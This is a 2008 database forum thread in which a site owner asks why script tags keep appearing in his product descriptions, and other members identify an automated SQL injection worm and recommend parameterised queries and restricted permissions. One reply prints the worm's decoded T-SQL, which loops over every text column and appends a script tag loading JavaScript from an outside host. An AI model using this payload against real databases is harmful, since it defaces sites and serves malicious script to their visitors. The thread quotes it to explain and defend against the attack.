| Author |
Topic |
|
Rob K
Starting Member
9 Posts |
 Posted - 2008-05-13 : 07:52:02
|
| I have a ASP website that uses SQL 2005.For the last 2 nights someone has hacked the DB and added a url with a script to the end of my product descriptions, the script is located on another server which is infected with viruses.For example, a field should read 'Clothing', when it gets hacked it reads 'Clothing <Script... blah blah here>'I have restored the DB each time but I cannot find how they are doing this, the windows Firewall is blocking any ext SQL connections so I am guessing there is something local that is doing this.Any ideas where to look for clues?Thanks. |
|
|
harsh_athalye
Master Smack Fu Yak Hacker
5581 Posts |
Posted - 2008-05-13 : 07:53:29
|
| SQL Injection will be my first guess.Harsh AthalyeIndia."The IMPOSSIBLE is often UNTRIED" |
 |
|
|
Rob K
Starting Member
9 Posts |
Posted - 2008-05-13 : 08:05:49
|
quote:
Originally posted by harsh_athalye
SQL Injection will be my first guess.Harsh AthalyeIndia."The IMPOSSIBLE is often UNTRIED"
Ok, not being a SQL expert, can you help me out here, where would I look to find if that is it? |
|
|
|
harsh_athalye
Master Smack Fu Yak Hacker
5581 Posts |
|
|
Rob K
Starting Member
9 Posts |
Posted - 2008-05-13 : 08:17:04
|
| Ok, thanks v much for that. |
|
|
|
Rob K
Starting Member
9 Posts |
Posted - 2008-05-13 : 09:57:30
|
| If it is a SQL injection, would that be in a log somewhere? |
|
|
|
pootle_flump
1064 Posts |
Posted - 2008-05-13 : 11:51:33
|
| Not in any form that you can read as it is. The problem with SQL Injection is that by definition it is not recognised by SQL Server as malicious. If you are concatenating user input into SQL statements for execution then you can be pretty confident this has been done by SQL Injection. |
|
|
|
nheidorn
Starting Member
28 Posts |
Posted - 2008-05-13 : 12:29:46
|
| Sounds like you might have been hit by the Automated SQL Injection Worm that is going around. You can read more here: [url]http://isc.sans.org/diary.html?storyid=4393[/url]. |
|
|
|
Rob K
Starting Member
9 Posts |
Posted - 2008-05-13 : 12:38:40
|
| Great, I have blocked the IP's mentioned on that link. |
|
|
|
GilaMonster
Master Smack Fu Yak Hacker
4507 Posts |
Posted - 2008-05-14 : 02:36:08
|
| If you want to protect yourself against SQL injection, use only stored procedures to access the DB. Use parameterised calls in your ASP code. Don't concatenate SQL statements and execute them. Restrict your database user to have only execute permissions on the stored procs and nothing else.--Gail Shaw |
|
|
|
SwePeso
Patron Saint of Lost Yaks
30421 Posts |
Posted - 2008-05-14 : 02:56:00
|
Where is the post Jeff made where he dissection the binary string into t-sql?
E 12°55'05.25"N 56°04'39.16" |
|
|
|
GilaMonster
Master Smack Fu Yak Hacker
4507 Posts |
Posted - 2008-05-14 : 03:58:44
|
quote:
Originally posted by Peso
Where is the post Jeff made where he dissection the binary string into t-sql?
If you find it, I'd very much like to see it.--Gail Shaw |
|
|
|
SwePeso
Patron Saint of Lost Yaks
30421 Posts |
Posted - 2008-05-14 : 04:16:05
|
I remember it was something aboutSELECT * FROM INFORMATION_SCHEMA.COLUMNS WHERE Type IN ('VARCHAR', 'CHAR', 'TEXT')
E 12°55'05.25"N 56°04'39.16" |
|
|
|
SwePeso
Patron Saint of Lost Yaks
30421 Posts |
Posted - 2008-05-14 : 04:23:40
|
The cleartext code looked similar to thisDECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.211796*.net/f****p.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
E 12°55'05.25"N 56°04'39.16" |
|
|
|
SwePeso
Patron Saint of Lost Yaks
30421 Posts |
|
|
GilaMonster
Master Smack Fu Yak Hacker
4507 Posts |
Posted - 2008-05-14 : 05:00:52
|
| Hmm. SQL Injection and XSS all in one. Interesting.Not close to as damaging as it could have been.--Gail Shaw |
|
|
|
SwePeso
Patron Saint of Lost Yaks
30421 Posts |
Posted - 2008-05-14 : 05:07:13
|
I agree.The attack could have encrypted all columns!I hope this learns all newbies, noobs and beginners to NEVER EVER concatenate string to send to database.Always use parametrized queries as a first line of defence.
E 12°55'05.25"N 56°04'39.16" |
|
|
|
Byapti
Starting Member
1 Post |
Posted - 2008-05-14 : 05:53:48
|
| Hi,I think the “Testing For SQL Injections” article on [url]http://www.stickyminds.com/sitewide.asp?Function=edetail&ObjectType=ART&ObjectId=11923&tth=DYN&tt=siteemail&iDyn=2 [/url]may be helpful in this discussion.This popular white paper is written by a software engineer from our organization Mindfire Solutions ([url]http://www.mindfiresolutions.com[/url]).I hope you find it useful!Cheers,Byapti |
|
|
|
SwePeso
Patron Saint of Lost Yaks
30421 Posts |
Posted - 2008-05-14 : 06:03:24
|
Is it really "a vulnerability at database layer"?The database is just performing what front-end application tells it to.
E 12°55'05.25"N 56°04'39.16" |
|
|
|
GilaMonster
Master Smack Fu Yak Hacker
4507 Posts |
Posted - 2008-05-14 : 07:47:36
|
quote:
Originally posted by Peso
I hope this learns all newbies, noobs and beginners to NEVER EVER concatenate string to send to database.Always use parametrized queries as a first line of defence.
Considering all the posts here and on Central in the last couple weeks, I somehow doubt it.--Gail Shaw |
|
|
|
harsh_athalye
Master Smack Fu Yak Hacker
5581 Posts |
Posted - 2008-05-14 : 07:59:37
|
Only experience can teach them then!  Harsh AthalyeIndia."The IMPOSSIBLE is often UNTRIED" |
|
|
|
Next Page
|
SQL Keeps gatting hacked